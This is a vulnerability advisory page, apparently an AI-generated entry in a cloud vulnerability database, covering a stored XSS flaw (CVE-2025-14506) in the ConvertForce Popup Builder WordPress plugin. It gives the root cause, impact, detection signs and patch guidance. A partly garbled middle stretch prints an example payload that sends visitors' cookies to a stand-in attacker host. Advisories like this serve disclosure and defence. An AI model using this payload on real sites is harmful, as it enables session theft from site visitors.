
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14506 is a Stored Cross-Site Scripting (XSS) vulnerability in the ConvertForce Popup Builder plugin for WordPress. It affects all versions up to and including 0.0.7, where the Gutenberg block's entrance_animation attribute lacks proper input sanitization and output escaping. The vulnerability was disclosed on January 10, 2026, and was reported by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from insufficient input sanitization and output escaping in the plugin's Gutenberg block handling code, specifically in inc/Blocks/Conversion.php at lines 47 and 66. An authenticated attacker with Author-level access or higher can supply a malicious value to the entrance_animation attribute of the ConvertForce Popup Builder Gutenberg block, which is then stored and rendered unsanitized in page output. The attack vector is network-based with low attack complexity and low privileges required, and no user interaction is needed beyond a victim visiting the injected page (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker (Author-level or above) to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of all users who visit the affected pages. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, or defacement of site content. The scope is changed, meaning the injected scripts can affect users beyond the attacker's own session, impacting site visitors' confidentiality and integrity (Wordfence).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Author-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).
entrance_animation attribute of the block to a crafted XSS payload, such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>, exploiting the lack of input sanitization./wp-admin/post.php or REST API endpoints (/wp-json/wp/v2/posts) containing script tags or encoded JavaScript in block attribute data; audit log entries showing Author-level users editing posts with ConvertForce Popup Builder blocks.wp_posts table) containing <script> tags or JavaScript event handlers within ConvertForce block markup./wp-content/plugins/convertforce-popup-builder/) on the server (Wordfence).The vulnerability was patched in the changeset 3419678 for the ConvertForce Popup Builder plugin, which introduced proper input sanitization and output escaping for the entrance_animation attribute. WordPress site administrators should update the ConvertForce Popup Builder plugin to a version beyond 0.0.7 immediately. As a temporary workaround, restrict Author-level and above user accounts to trusted individuals only, or deactivate and remove the plugin until a patched version is confirmed installed (WordPress Trac, Wordfence).
Wordfence included this vulnerability in their weekly WordPress vulnerability report for January 5–11, 2026, highlighting it as part of a broader set of plugin vulnerabilities discovered that week (Wordfence Blog). The vulnerability received standard coverage from security aggregators such as VulDB, Vulners, and CIRCL, with no notable controversy or significant community discussion beyond routine disclosure (VulDB).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."